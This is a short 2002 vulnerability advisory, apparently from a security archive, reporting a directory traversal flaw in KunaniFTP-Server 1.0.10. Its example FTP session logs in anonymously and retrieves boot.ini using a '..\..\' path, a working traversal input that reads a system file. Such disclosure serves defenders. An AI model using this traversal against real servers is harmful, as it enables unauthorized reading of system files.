KunaniFTP-Server v.1.0.10 allows dictionary traversal

2002-12-11T00:00:00
ID SECURITYVULNS:DOC:3856
Type securityvulns
Reporter Securityvulns
Modified 2002-12-11T00:00:00

Description

KunaniFTP-Server v.1.0.10 allows dictionary traversal:

Some ftp-commands in KunaniFTP-Server allows dictionary traversal.

Example:

Verbindung mit server. 220 Kunani FTP Server Ready ( www.kunani.com ) Benutzer (server:(none)): anonymous 331 Password required for anonymous. Kennwort: billsucks 230 User anonymous logged in. Ftp> get ..\..\..\..\..\boot.ini 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Transfer complete. Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.

Sorry for my very bad english. g

~~ Zero X, member of www.lobnan.de ~~


http://www.linuxmail.org/ Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze